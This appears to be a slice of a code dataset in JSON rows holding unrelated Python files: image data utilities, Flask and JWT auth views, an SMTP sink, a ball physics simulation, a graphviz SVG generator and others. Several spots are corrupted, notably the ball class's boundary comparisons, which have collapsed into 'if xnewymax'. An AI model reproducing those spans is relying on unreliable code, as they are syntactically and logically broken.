inp\n"},"size":{"kind":"number","value":4833,"string":"4,833"}}},{"rowIdx":128474,"cells":{"max_stars_repo_path":{"kind":"string","value":"data/utils.py"},"max_stars_repo_name":{"kind":"string","value":"YDDDDG/3D2Unet"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2172260"},"content":{"kind":"string","value":"import numpy as np\nimport torch\nimport gc\n\nclass Crop(object):\n \"\"\"\n Crop randomly the image in a sample.\n Args: output_size (tuple or int): Desired output size. If int, square crop is made.\n \"\"\"\n\n def __init__(self, output_size):\n assert isinstance(output_size, (int, tuple, list))\n if isinstance(output_size, int):\n self.output_size = (output_size, output_size)\n else:\n assert len(output_size) == 2\n self.output_size = output_size\n\n def __call__(self, sample):\n image, label = sample['image'], sample['label']\n top, left = sample['top'], sample['left']\n new_h, new_w = self.output_size\n new_h//=2\n new_w//=2\n sample['image'] = image[top: top + new_h,\n left: left + new_w,:]\n sample['label'] = label[top*2: (top + new_h)*2,\n left*2: (left + new_w)*2,:]\n\n return sample\n\n\nclass Flip(object):\n \"\"\"\n shape is (h,w,c)\n \"\"\"\n\n def __call__(self, sample):\n flag_lr = sample['flip_lr']\n flag_ud = sample['flip_ud']\n if flag_lr == 1:\n sample['image'] = np.fliplr(sample['image'])\n sample['label'] = np.fliplr(sample['label'])\n if flag_ud == 1:\n sample['image'] = np.flipud(sample['image'])\n sample['label'] = np.flipud(sample['label'])\n\n return sample\n\n\nclass Rotate(object):\n \"\"\"\n shape is (h,w,c)\n \"\"\"\n\n def __call__(self, sample):\n flag = sample['rotate']\n if flag == 1:\n sample['image'] = sample['image'].transpose(1, 0, 2)\n sample['label'] = sample['label'].transpose(1, 0, 2)\n\n return sample\n\n\nclass Sharp2Sharp(object):\n def __call__(self, sample):\n flag = sample['s2s']\n if flag < 1:\n sample['image'] = sample['label'].copy()\n return sample\n\n\nclass ToTensor(object):\n \"\"\"\n Convert ndarrays in sample to Tensors.\n \"\"\"\n\n def __call__(self, sample):\n image, label = sample['image'], sample['label']\n # swap color axis because\n # numpy image: H x W x C\n # torch image: C X H X W\n image = np.ascontiguousarray(image.transpose((2, 0, 1))[np.newaxis, :])\n label = np.ascontiguousarray(label.transpose((2, 0, 1))[np.newaxis, :])\n sample['image'] = torch.from_numpy(image).float()\n sample['label'] = torch.from_numpy(label).float()\n return sample\n\n\ndef normalize(x, centralize=False, normalize=False, val_range=255.0):\n if centralize:\n x = x - val_range / 2\n if normalize:\n x = x / val_range\n\n return x\n\n\ndef normalize_reverse(x, centralize=False, normalize=False, val_range=255.0):\n if normalize:\n x = x * val_range\n if centralize:\n x = x + val_range / 2\n\n return x\n\ndef equalize_histogram(image, number_bins=256):\n image_histogram, bins = np.histogram(image.flatten(), number_bins)\n cdf = image_histogram.cumsum()\n cdf = (number_bins - 1) * cdf / cdf[-1] # normalize\n \n image_equalized = np.interp(image.flatten(), bins[:-1], cdf)\n \n return image_equalized.reshape(image.shape)\n\ndef get_file_path(ds_type, gain='00', root_path='/data/zengyuhang_data'):\n\n ds_type=ds_type\n FILE_LIST=\"./data_list/\"+ ds_type + \"_list\"\n # get train IDs\n with open(FILE_LIST) as f:\n text = f.readlines()\n _files = text\n\n _ids = [line.strip().split(' ')[0] for line in _files]\n gt_files = [line.strip().split(' ')[1] for line in _files]\n in_files = [line.strip().split(' ')[2] for line in _files]\n\n\n gain=gain\n _ids_copy=[]\n for item in _ids:\n if item[-7:-5]==gain:\n _ids_copy.append(item)\n _ids=_ids_copy\n\n\n root_path=root_path\n\n gt_files_copy=[]\n for item in gt_files:\n if item[-11:-9]==gain:\n gt_files_copy.append(root_path+item[1:])\n gt_files=gt_files_copy\n\n in_files_copy=[]\n for item in in_files:\n if item[-11:-9]==gain:\n in_files_copy.append(root_path+item[1:])\n in_files=in_files_copy\n\n return _ids, gt_files, in_files\n\n\ndef get_all_file_path(ds_type, root_path='/data/zengyuhang_data'):\n\n ds_type=ds_type\n FILE_LIST=\"./data_list/\"+ ds_type + \"_list\"\n # get train IDs\n with open(FILE_LIST) as f:\n text = f.readlines()\n _files = text\n\n _ids = [line.strip().split(' ')[0] for line in _files]\n gt_files = [line.strip().split(' ')[1] for line in _files]\n in_files = [line.strip().split(' ')[2] for line in _files]\n\n return _ids, gt_files, in_files\n\n\ndef gen_var(seqs):\n\n records=dict()\n\n for seq in seqs:\n sample=dict()\n\n\n print(seq[0],\"start loading...\")\n temp_dark=np.load(seq[0])\n dark_shape=temp_dark.shape\n del temp_dark\n gc.collect()\n\n print(seq[0],\"start loading and EH process...\")\n sample['Dark']=equalize_histogram(np.memmap(seq[0], dtype='uint16', mode='r',shape=dark_shape),65536)\n # sample['Dark']=equalize_histogram(np.load(seq[0]),65536)\n print(seq[0],\"is processed\")\n\n print(seq[1],\"start loading...\")\n temp_bright=np.load(seq[1])\n bright_shape=temp_bright.shape\n del temp_bright\n gc.collect()\n\n sample['Bright']=np.memmap(seq[1], dtype='uint8', mode='r',shape=bright_shape)\n # sample['Bright']=np.load(seq[1])\n print(seq[1],\"is loaded\")\n\n\n # print('dark_shape',sample['Dark'].shape)\n # print('bright_shape',sample['Bright'].shape)\n records[seq]=sample\n return records\n\n\n\ndef gen_seq(seq):\n\n sample=dict()\n\n\n print(seq[0],\"start loading...\")\n temp_dark=np.load(seq[0])\n dark_shape=temp_dark.shape\n del temp_dark\n gc.collect()\n\n print(seq[0],\"start loading and EH process...\")\n sample['Dark']=equalize_histogram(np.memmap(seq[0], dtype='uint16', mode='r',shape=dark_shape),65536)\n print(seq[0],\"is processed\")\n\n print(seq[1],\"start loading...\")\n temp_bright=np.load(seq[1])\n bright_shape=temp_bright.shape\n del temp_bright\n gc.collect()\n\n sample['Bright']=np.memmap(seq[1], dtype='uint8', mode='r',shape=bright_shape)\n print(seq[1],\"is loaded\")\n\n\n # print('dark_shape',sample['Dark'].shape)\n # print('bright_shape',sample['Bright'].shape)\n return sample\n"},"size":{"kind":"number","value":6605,"string":"6,605"}}},{"rowIdx":128475,"cells":{"max_stars_repo_path":{"kind":"string","value":"lead/web_app.py"},"max_stars_repo_name":{"kind":"string","value":"M4gicT0/Distribute"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2172181"},"content":{"kind":"string","value":"import os\nimport json\nimport errno\n\nfrom node import Node\nfrom subprocess import call\nfrom werkzeug import secure_filename\nfrom flask import Flask, render_template, abort, request, jsonify\n\napp = Flask(__name__)\ncontroller = None\nip = None\nport = None\n\n\nclass WebApp():\n\n def __init__(self, ctrl, host, p):\n global controller, ip, port\n controller = ctrl\n ip = host\n port = p\n\n\n @app.route('/', methods=['GET'])\n def show_page():\n try:\n return render_template('upload.html', rest_host=ip, rest_port=port,\n entries=controller.get_ledger_entries())\n except TemplateNotFound:\n abort(404)\n\n\n @app.route('/storage', methods=['POST'])\n def upload_file():\n if 'file' in request.files:\n success = controller.store(\n secure_filename(request.files['file'].filename),\n request.files['file']\n )\n if success:\n response = jsonify({\"msg\": 'File uploaded successfully.'})\n response.status_code = 200\n return response\n else:\n response = jsonify({\"msg\": \"File couldn't be written to nodes.\"})\n response.status_code = 500\n return response\n return jsonify({\"msg\": \"File not present in request\"})\n\n\n @app.route('/storage/', methods=['GET'])\n def download_file(file_name):\n file = controller.retrieve(\n secure_filename(request.args.get('file_name'))\n )\n if file:\n response = jsonify({\"content\": file})\n response.status_code = 200\n return response\n else:\n response = jsonify({\"msg\": \"File couldn't be found.\"})\n response.status_code = 500\n return response\n\n\n\n @app.route('/strategy/', methods=['POST'])\n def set_strategy(choice):\n controller.set_strategy(choice)\n\n\n def start(self):\n app.run(debug=True, host=ip, port=port)\n"},"size":{"kind":"number","value":2041,"string":"2,041"}}},{"rowIdx":128476,"cells":{"max_stars_repo_path":{"kind":"string","value":"classical_algorithms/python/tests/test_binary_search.py"},"max_stars_repo_name":{"kind":"string","value":"ajeet1308/code_problems"},"max_stars_count":{"kind":"number","value":61,"string":"61"},"id":{"kind":"string","value":"2172605"},"content":{"kind":"string","value":"import unittest\nfrom classical_algorithms.python.BinarySearch import BinarySearch\n\nclass TestBinarySearch(unittest.TestCase):\n def test_binary_search(self):\n binary_search = BinarySearch()\n\n print('None Input')\n self.assertRaises(TypeError, binary_search.search, None)\n\n print('Empty Input')\n self.assertEqual(binary_search.search([], 1), False)\n\n print('One Element')\n self.assertEqual(binary_search.search([25], 25), 0)\n\n print('Two or More Elements')\n array = [0, 10, 15, 100, 150, 200, 203, 230]\n self.assertEqual(binary_search.search(array, 15), 2)\n\n print('Two or More with negative Elements')\n array = [-20, -15, -5, 0, 10, 15, 100, 150, 200, 203, 230]\n self.assertEqual(binary_search.search(array, -15), 1)\n\n print('Success: binary_search_search\\n')\n\nif __name__ == '__main__':\n unittest.main()"},"size":{"kind":"number","value":906,"string":"906"}}},{"rowIdx":128477,"cells":{"max_stars_repo_path":{"kind":"string","value":"server/website/script/fixture_generators/metric_settings/oracle/create_metric_settings.py"},"max_stars_repo_name":{"kind":"string","value":"mjain2/ottertune"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2171522"},"content":{"kind":"string","value":"#\n# OtterTune - create_metric_settings.py\n#\n# Copyright (c) 2017-18, Carnegie Mellon University Database Group\n#\nimport json\nimport shutil\n\n\ndef main():\n final_metrics = []\n with open('oracle.txt', 'r') as f:\n odd = 0\n entry = {}\n fields = {}\n lines = f.readlines()\n for line in lines:\n line = line.strip().replace(\"\\n\", \"\")\n if not line:\n continue\n if line == 'NAME' or line.startswith('-'):\n continue\n if odd == 0:\n entry = {}\n entry['model'] = 'website.MetricCatalog'\n fields = {}\n fields['name'] = \"global.\" + line\n fields['summary'] = line\n fields['vartype'] = 2\t # int\n fields['scope'] = 'global'\n fields['metric_type'] = 3\t # stat\n if fields['name'] == \"global.user commits\":\n fields['metric_type'] = 1\t # counter\n fields['dbms'] = 18 # oracle\n entry['fields'] = fields\n final_metrics.append(entry)\n with open('oracle_metrics.json', 'w') as f:\n json.dump(final_metrics, f, indent=4)\n shutil.copy('oracle_metrics.json', '../../../../website/fixtures/oracle_metrics.json')\n\n\nif __name__ == '__main__':\n main()\n"},"size":{"kind":"number","value":1346,"string":"1,346"}}},{"rowIdx":128478,"cells":{"max_stars_repo_path":{"kind":"string","value":"setup.py"},"max_stars_repo_name":{"kind":"string","value":"kahinton/wsgimagic"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2172461"},"content":{"kind":"string","value":"from setuptools import setup, find_packages\n\nwith open('README.md', 'r') as readme:\n long_desc = readme.read()\n\nsetup(name='wsgimagic',\n version='1.0.0',\n description='Serverless WSGI apps made easy',\n packages=find_packages(exclude=('tests',)),\n author=\"\",\n license=\"MIT\",\n long_description=long_desc,\n long_description_content_type='text/markdown')\n\n"},"size":{"kind":"number","value":396,"string":"396"}}},{"rowIdx":128479,"cells":{"max_stars_repo_path":{"kind":"string","value":"app/api/auth.py"},"max_stars_repo_name":{"kind":"string","value":"eddy0/flask-mega"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2172407"},"content":{"kind":"string","value":"from flask import g, make_response, jsonify\nfrom flask_httpauth import HTTPBasicAuth\n\nfrom app.api.errors import error_response\nfrom app.models import User\n\nauth = HTTPBasicAuth()\n\n\n@auth.verify_password\ndef verify_password(username_or_token, password):\n user = User.verify_auth_token(username_or_token)\n if not user:\n user = User.query.filter_by(username=username_or_token).first()\n if not user or not user.verify_password(password):\n return False\n g.user = user\n return True\n\n\n@auth.error_handler\ndef basic_auth_error(status):\n return error_response(status)\n\n@auth.error_handler\ndef unauthorized():\n return make_response(jsonify({'error': 'Unauthorized access'}), 403)"},"size":{"kind":"number","value":713,"string":"713"}}},{"rowIdx":128480,"cells":{"max_stars_repo_path":{"kind":"string","value":"app/esper/queries/interview_with_person_x.py"},"max_stars_repo_name":{"kind":"string","value":"scanner-research/esper-tv"},"max_stars_count":{"kind":"number","value":5,"string":"5"},"id":{"kind":"string","value":"2172002"},"content":{"kind":"string","value":"from esper.prelude import *\nfrom .queries import query\n\n@query('Interview with person X (rekall)')\ndef interview_with_person_x():\n from query.models import LabeledCommercial, FaceIdentity\n from rekall.video_interval_collection import VideoIntervalCollection\n from rekall.temporal_predicates import before, after, overlaps\n from rekall.logical_predicates import or_pred\n from esper.rekall import intrvllists_to_result\n\n # Get list of sandbox video IDs\n sandbox_videos = [\n row.video_id\n for row in LabeledCommercial.objects.distinct('video_id')\n ]\n\n TWENTY_SECONDS = 600\n FORTY_FIVE_SECONDS = 1350\n EPSILON = 10\n\n guest_name = \"\"\n\n # Load hosts and instances of guest from SQL\n identities = FaceIdentity.objects.filter(face__shot__video_id__in=sandbox_videos)\n hosts_qs = identities.filter(face__is_host=True)\n guest_qs = identities.filter(identity__name=guest_name).filter(probability__gt=0.7)\n\n # Put bounding boxes in SQL\n hosts = VideoIntervalCollection.from_django_qs(\n hosts_qs.annotate(video_id=F(\"face__shot__video_id\"),\n min_frame=F(\"face__shot__min_frame\"),\n max_frame=F(\"face__shot__max_frame\"))\n )\n guest = VideoIntervalCollection.from_django_qs(\n guest_qs.annotate(video_id=F(\"face__shot__video_id\"),\n min_frame=F(\"face__shot__min_frame\"),\n max_frame=F(\"face__shot__max_frame\"))\n )\n\n # Get all shots where the guest and a host are on screen together\n guest_with_host = guest.overlaps(hosts).coalesce()\n\n # This temporal predicate defines A overlaps with B, or A before by less than 10 frames,\n # or A after B by less than 10 frames\n overlaps_before_or_after_pred = or_pred(\n or_pred(overlaps(), before(max_dist=EPSILON), arity=2),\n after(max_dist=EPSILON), arity=2)\n\n # This code finds sequences of:\n # guest with host overlaps/before/after host OR\n # guest with host overlaps/before/after guest\n interview_candidates = guest_with_host \\\n .merge(hosts, predicate=overlaps_before_or_after_pred) \\\n .set_union(guest_with_host.merge(\n guest, predicate=overlaps_before_or_after_pred)) \\\n .coalesce()\n\n # Sequences may be interrupted by shots where the guest or host don't\n # appear, so dilate and coalesce to merge neighboring segments\n interviews = interview_candidates \\\n .dilate(TWENTY_SECONDS) \\\n .coalesce() \\\n .dilate(-1 * TWENTY_SECONDS) \\\n .filter_length(min_length=FORTY_FIVE_SECONDS)\n\n # Return intervals\n return intrvllists_to_result(interviews.get_allintervals())\n"},"size":{"kind":"number","value":2685,"string":"2,685"}}},{"rowIdx":128481,"cells":{"max_stars_repo_path":{"kind":"string","value":"services/mail-sink.py"},"max_stars_repo_name":{"kind":"string","value":"easydns/chapps"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2172123"},"content":{"kind":"string","value":"#!/usr/bin/env python3\n\"\"\"\nStarts a service on 127.0.0.1:25025 which serves as a sink for email\n\"\"\"\n### requires the python-pidfile library from https://github.com/mosquito/python-pidfile\n### requires aiosmtpd\nimport asyncio, pidfile, signal, functools\nfrom smtplib import SMTP, SMTPRecipientsRefused\nimport aiosmtpd\nfrom aiosmtpd.handlers import Sink\nfrom aiosmtpd.smtp import SMTP as SMTPServer\nimport logging\n\nLISTEN_PORT = 25025\n# TRANSMIT_PORT = 10026\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\n\n\ndef signal_handler(sig, *args):\n if sig in {signal.SIGTERM, sig.SIGINT}:\n logger.debug(f\"CHAPPS exiting on {signal.Signals(sig)} ({sig}).\")\n raise SystemExit\n\n\ndef install_asyncio_signal_handlers(loop):\n for signame in {\"SIGTERM\", \"SIGINT\"}:\n sig = getattr(signal, signame)\n loop.add_signal_handler(sig, functools.partial(signal_handler, sig))\n\n\n# class NullFilterHandler:\n# async def handle_RCPT(self, server, session, envelope, address, rcpt_options):\n# \"\"\"Handle recipient phase\"\"\"\n# envelope.rcpt_tos.append( address )\n# return \"250 OK\"\n\n# async def handle_DATA(self, server, session, envelope):\n# \"\"\"Handle DATA phase\"\"\"\n# logger.debug(f\"Message from {envelope.mail_from} to \")\n# try:\n# client = SMTP.sendmail( envelope.mail_from, envelope.rcpt_tos, envelope.content )\n# return '250 Message accepted for delivery'\n# except smtplib.SMTPResponseException as e:\n# logger.exception(\"Upstream Postfix did not like this message.\")\n# return f\"{e.smtp_code} {e.smtp_error}\"\n# except smtplib.SMTPException:\n# logger.exception(\"Raised trying to send from {envelope.mail_from} to {','.join(envelope.rcpt_tos)}\")\n# return \"550 Requested action not taken\"\n\n\nasync def main():\n \"\"\"The grand shebang\"\"\"\n logger.debug(\"Starting SMTP sink...\")\n try:\n with pidfile.PIDFile(\"/tmp/mail-sink.pid\"):\n logger.debug(\"mail-sink started.\")\n loop = asyncio.get_running_loop()\n install_asyncio_signal_handlers(loop)\n srv = await loop.create_server(\n functools.partial(SMTPServer, Sink),\n \"localhost\",\n LISTEN_PORT,\n start_serving=False,\n )\n async with srv:\n await srv.serve_forever()\n except pidfile.AlreadyRunningError:\n logger.exception(\"mail-sink is already running. Exiting.\")\n except asyncio.exceptions.CancelledError:\n logger.debug(\"mail-sink exiting on signal.\")\n\n\nif __name__ == \"__main__\":\n try:\n asyncio.run(main())\n except Exception:\n logger.exception(\"UNEX\")\n"},"size":{"kind":"number","value":2751,"string":"2,751"}}},{"rowIdx":128482,"cells":{"max_stars_repo_path":{"kind":"string","value":"maincode.py"},"max_stars_repo_name":{"kind":"string","value":"ParthaAcharjee/Ball-Movement-in-2D"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2172393"},"content":{"kind":"string","value":"# Ball movement in 2D space: An example of elastic collision and position tracking.\n\n\nimport random as rnd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib.animation as animation\n\nclass ball:\n 'Ball class, store ball position and velocities'\n count=0\n \n def __init__(self,**arg):\n if 'x' in arg.keys():\n self.x=arg['x'];\n else:\n self.x=rnd.randrange(0,100,1);\n \n if 'y' in arg.keys(): \n self.y=arg['y'];\n else:\n self.y=rnd.randrange(0,100,1);\n\n if 'r' in arg.keys(): \n self.r=arg['r'];\n else:\n self.r=1;\n \n if 'vx' in arg.keys(): \n self.vx=arg['vx'];\n else:\n self.vx=rnd.randrange(-10,10,1);\n \n if 'vy' in arg.keys():\n self.vy=arg['vy'];\n else:\n self.vy=rnd.randrange(-10,10,1);\n \n ball.count+=1;\n \n \n def show(self):\n print(\"x,y,vx,vy: \",self.x,self.y,self.vx,self.vy)\n \n def plot(self):\n plt.scatter(self.x,self.y)\n plt.show()\n def updatePosition(self,t,L):\n xmin,xmax,ymin,ymax=L;\n xnew=self.x+self.vx*t;\n ynew=self.y+self.vy*t;\n\n if xnew>xmax: xnew=2*xmax-xnew;self.vx=-self.vx;\n if xnewymax: ynew=2*ymax-ynew;self.vy=-self.vy;\n if ynew MAX_LINE_LEN:\n lines.append(cur_line)\n cur_line = word\n else:\n cur_line = added_line\n\n if cur_line:\n lines.append(cur_line)\n\n return \"
\".join(lines)\n\ndef create_label(node):\n title = f\"{node['title']}\"\n if node['description'] and node['description'] != \"NA\":\n return title+\"
\"+create_multiline_description(node['description'])\n else:\n return title\n\ndef generate_graphviz_code(all_nodes,all_relations,show_nodes,node_types,rel_types):\n show_nodes = set(show_nodes)\n nodes = [n for n in all_nodes if n['node'] in show_nodes]\n relations = [rel for rel in all_relations\n if rel['source'] in show_nodes and rel['dest'] in show_nodes and (rel['type'] == 'dependent' or rel['type'] == 'equal')]\n\n node_graph = [f'{n[\"node\"]} [label=<{create_label(n)}>,color=\"{node_types[n[\"type\"]][\"color\"]}\",id={n[\"node\"]+\"__el\"}]' for n in nodes]\n rel_graph = [f'{rel[\"source\"]} -> {rel[\"dest\"]} [color=\"{rel_types[rel[\"type\"]][\"color\"]}\"]' for rel in relations]\n graph = f'''\n digraph search {{\n overlap = false;\n {linejoin(node_graph)}\n {linejoin(rel_graph)}\n }}\n '''\n return graph\n\ndef call_graphviz(graphviz_code):\n graphviz_args = \"dot -Tsvg\".split(' ')\n out = subprocess.run(graphviz_args,input=graphviz_code,stdout=subprocess.PIPE,encoding=\"utf-8\").stdout\n #print(\"\\n\".join(out.split(\"\\n\")[:3]))\n stripped = \"\\n\".join(out.split(\"\\n\")[3:])\n comments_removed = re.sub(\"()\", \"\", stripped, flags=re.DOTALL)\n return comments_removed\n\ndef get_adj_list(nodes,relations):\n return {n['node']:[rel['dest'] for rel in relations if rel['source'] == n['node']] for n in nodes}\n\n\ndef score_nodes(root,adj_list):\n scores = dict()\n depth_nodes = [root]\n for x in range(10):\n new_depth_nodes = []\n for n in depth_nodes:\n if n not in scores:\n scores[n] = 8.**(-x) * (1+1e-5*len(adj_list[n]))\n for e in adj_list[n]:\n new_depth_nodes.append(e)\n\n depth_nodes = new_depth_nodes\n\n sortables_scores = [(v,k) for k,v in scores.items()]\n sortables_scores.sort(reverse=True)\n return [n for v,n in sortables_scores]\n\ndef generate_all_graphs(graph_size,nodes,relations,node_types,rel_types):\n adj_list = get_adj_list(nodes,relations)\n nodes_generated = {}\n node_to_idx = {}\n vis_codes = []\n for node in nodes:\n node_names = score_nodes(node['node'],adj_list)[:graph_size] if graph_size < len(adj_list) else list(adj_list)\n uniq_node_names = tuple(sorted(node_names))\n if uniq_node_names not in nodes_generated:\n nodes_generated[uniq_node_names] = len(vis_codes)\n node_to_idx[node['node']] = len(vis_codes)\n viz_code = generate_graphviz_code(nodes,relations,node_names,node_types,rel_types)\n vis_codes.append(viz_code)\n else:\n node_to_idx[node['node']] = nodes_generated[uniq_node_names]\n pool = ThreadPoolExecutor(max_workers=multiprocessing.cpu_count())\n svg_codes = list(pool.map(call_graphviz,vis_codes))\n graphs = [(node['node'],svg_codes[node_to_idx[node['node']]]) for node in nodes]\n return graphs\n\ndef save_graphs_as_files(dest_folder,svg_list):\n os.makedirs(dest_folder,exist_ok=True)\n for node_name,svg_code in svg_list:\n fname = node_name+\".svg\"\n dest_path = os.path.join(dest_folder,fname)\n\n write_file(dest_path,svg_code)\n\ndef encode_graphs_as_html(svg_list):\n all_data = [\"\"]\n for node_name,svg_code in svg_list:\n stripped_svg_code = svg_code.replace(\"\\n\",\"\")\n\n data_str = f''\n all_data.append(data_str)\n return \"\\n\\t\\t\".join(all_data)\n\nif __name__ == \"__main__\":\n node_types = key_dictlist_by(read_csv(\"examples/computer_science/node-types.csv\"),'type_id')\n rel_types = key_dictlist_by(read_csv(\"examples/computer_science/rel-types.csv\"),'type_id')\n nodes = read_csv(\"examples/computer_science/nodes.csv\")\n rels = read_csv(\"examples/computer_science/relationships.csv\")\n show_nodes = [n['node'] for n in nodes]\n graph_code = (generate_graphviz_code(nodes,rels,show_nodes,node_types,rel_types))\n print(graph_code)\n svg_code = call_graphviz(graph_code)\n html_code = encode_graphs_as_html([(\"bob\",svg_code)])\n print(svg_code)\n print(html_code)\n"},"size":{"kind":"number","value":4917,"string":"4,917"}}},{"rowIdx":128484,"cells":{"max_stars_repo_path":{"kind":"string","value":"SFR.py"},"max_stars_repo_name":{"kind":"string","value":"mattcwilde/werk-squad-tools"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2171275"},"content":{"kind":"string","value":"import pandas as pd\nimport numpy as np\nfrom astropy import constants as const\nfrom astropy import units as u\nfrom astropy.cosmology import FlatLambdaCDM\n\ndef SFR(Ha_array):\n \"\"\" \n Calculate distance using H-alpha luminosity.\n -------------------------------------------\n Method:\n Distance calc made using astropy.cosmology packages cosmo.luminosity_distance() method\n See documentation here: https://docs.astropy.org/en/stable/cosmology/\n ------------------------------------------\n Args:\n Numpy nd.array of H-alpha Luminosities\n ------------------------------------------ \n Returns:\n Numpy nd.array\n \"\"\"\n SFR = np.array([])\n SFR_calc = [((7.9e-42) * i) for i in Ha_array]\n SFR = np.append(SFR, SFR_calc)\n return SFR\n\ndef SFR_switchboard(lines_df):\n \"\"\" \n Assign flags based on which lines are used to calculate SFR/ H-alpha Luminosity\n if Flag = 'NaN' -- No determination\n = 'Ha' -- H-alpha lines used \n = 'Hb' -- H-beta lines used\n -------------------------------------------\n Method Assumed for SFR/H-alpha Lum calculations:\n Ha_Lum_Ha = (LQ_cut_Ha['Halpha_flux']) * (4 * np.pi * (LQ_cut_Ha['Distance_cm'])**2)\n Ha_Lum_Hb = ((LQ_cut_Hb['Hbeta_flux']) * 2.86) * (4 * np.pi * (LQ_cut_Hb['Distance_cm'])**2)\n Where LQ_cut_* corresponds to using the respective *_cond written in this function\n \n SFR = ((7.9e-42) * Ha_Lum)\n ------------------------------------------\n Args:\n DataFrame containing Line Quality information for H-alpha and H-beta\n ------------------------------------------ \n Returns:\n 3 numpy.ndarray (arrays = Flags, Ha indices, Hb indices), all entries dtype = str\n \"\"\"\n # Make integers for conditionals\n lines_df.Halpha_LQ.astype('Int64')\n lines_df.Hbeta_LQ.astype('Int64')\n # Conditions for each calc\n Ha_cond = (lines_df['Halpha_LQ']>0) & (lines_df['Halpha_LQ']<2) \n Hb_cond = (lines_df['Hbeta_LQ']>0) & (lines_df['Hbeta_LQ']<2) & (lines_df['Halpha_LQ']!=1)\n # Make flags\n SFR_flags = np.full(len(lines_df), str(np.nan))\n SFR_flags[Ha_cond] = 'Ha'\n SFR_flags[Hb_cond] = 'Hb'\n return SFR_flags"},"size":{"kind":"number","value":2218,"string":"2,218"}}},{"rowIdx":128485,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/dataset/writer/csv_writer.py"},"max_stars_repo_name":{"kind":"string","value":"KlemenGrebovsek/Cargo-stowage-optimization"},"max_stars_count":{"kind":"number","value":2,"string":"2"},"id":{"kind":"string","value":"2172511"},"content":{"kind":"string","value":"import csv\nimport os\n\nfrom src.dataset.writer.ds_writer import DatasetWriterInterface\nfrom src.model.dataset import Dataset\n\n\nclass CSVDatasetWriter(DatasetWriterInterface):\n\n def write(self, dir_path: str, file_name: str, dataset: Dataset):\n \"\"\"Writes dataset to csv file.\n\n Args:\n file_name: Dataset file name without file extension.\n dataset: Dataset to write.\n dir_path: Path to dir.\n\n Throws:\n ValueError\n\n Returns: Dataset from file.\n \"\"\"\n\n if dir_path is None or len(dir_path) < 1 or not os.path.isdir(dir_path):\n raise ValueError('Invalid dir path')\n\n if file_name is None or len(file_name) < 1:\n raise ValueError('Invalid file name')\n\n full_path = os.path.join(dir_path, file_name+'.csv')\n\n if os.path.isfile(full_path):\n raise ValueError('File already exists')\n\n with open(full_path, 'w', newline='') as f:\n writer = csv.writer(f)\n writer.writerow([dataset.title])\n\n writer.writerow([dataset.total_packages,\n dataset.total_stations,\n dataset.width,\n dataset.height])\n\n for package in dataset.packages:\n writer.writerow([package.id, package.station_in, package.station_out, package.weight])\n"},"size":{"kind":"number","value":1393,"string":"1,393"}}},{"rowIdx":128486,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/closure_table/auth/views.py"},"max_stars_repo_name":{"kind":"string","value":"vyacheslav-bezborodov/dvhb"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2172575"},"content":{"kind":"string","value":"import hashlib\nfrom datetime import datetime, timedelta\n\nimport jwt\nfrom aiohttp import web\nfrom closure_table.auth.db.queries import user_get\nfrom closure_table.settings import JWT_ALGORITHM, JWT_EXP_DELTA_SECONDS, JWT_SECRET\n\n\nasync def user_login_view(request):\n params = await request.json()\n email = params.get('email')\n password = params.get('password')\n async with request.app['db'].acquire() as conn:\n user = await user_get(conn, email)\n m = hashlib.sha512()\n m.update(str(password).encode())\n m.update(str(user.get('id')).encode())\n if email != user.get('email') or m.hexdigest() != user.get('password'):\n return web.json_response(status=400, data={\n 'error': 'Incorrect email or password'\n })\n expired = datetime.utcnow() + timedelta(seconds=JWT_EXP_DELTA_SECONDS)\n payload = {\n 'email': user['email'],\n 'exp': expired\n }\n jwt_token = jwt.encode(payload, JWT_SECRET, JWT_ALGORITHM)\n return web.json_response({\n 'token': jwt_token.decode(),\n 'expired': expired.strftime('%c'),\n })\n"},"size":{"kind":"number","value":1092,"string":"1,092"}}},{"rowIdx":128487,"cells":{"max_stars_repo_path":{"kind":"string","value":"src/app/model/group.py"},"max_stars_repo_name":{"kind":"string","value":"SLeRest/3DSliceServer"},"max_stars_count":{"kind":"number","value":1,"string":"1"},"id":{"kind":"string","value":"2171818"},"content":{"kind":"string","value":"from model.base import BaseModel\nfrom schema.group import GroupOut\nfrom sqlalchemy import (\n Column,\n String\n)\nfrom sqlalchemy.orm import relationship\n\nclass Group(BaseModel):\n __tablename__ = 'GROUP'\n\n name = Column('NAME', String, nullable=False, unique=True)\n group_user = relationship(\"UserGroup\", back_populates=\"group\")\n group_permission = relationship(\"Permission\", back_populates=\"group\")\n group_permission_part = relationship(\"PermissionPart\", back_populates=\"group\")\n\n def ToGroupOut(self) -> GroupOut:\n return GroupOut(\n id = self.id,\n name = self.name,\n created_at = self.created_at,\n updated_at = self.updated_at\n )\n"},"size":{"kind":"number","value":711,"string":"711"}}},{"rowIdx":128488,"cells":{"max_stars_repo_path":{"kind":"string","value":"hwtHls/ssa/__init__.py"},"max_stars_repo_name":{"kind":"string","value":"Nic30/hwtHls"},"max_stars_count":{"kind":"number","value":8,"string":"8"},"id":{"kind":"string","value":"2172323"},"content":{"kind":"string","value":"\"\"\"\nThis module is similar to a LLVM SSA.\n\nhttps://releases.llvm.org/2.6/docs/LangRef.html#i_load\n\"\"\""},"size":{"kind":"number","value":101,"string":"101"}}},{"rowIdx":128489,"cells":{"max_stars_repo_path":{"kind":"string","value":"config.py"},"max_stars_repo_name":{"kind":"string","value":"Mogekoff/xopygame"},"max_stars_count":{"kind":"number","value":0,"string":"0"},"id":{"kind":"string","value":"2172016"},"content":{"kind":"string","value":"w_widht = 500\r\nw_height = 500\r\ncolors = { 'grid': (255,255,255),\r\n 'background': (0,0,0),\r\n 'x': 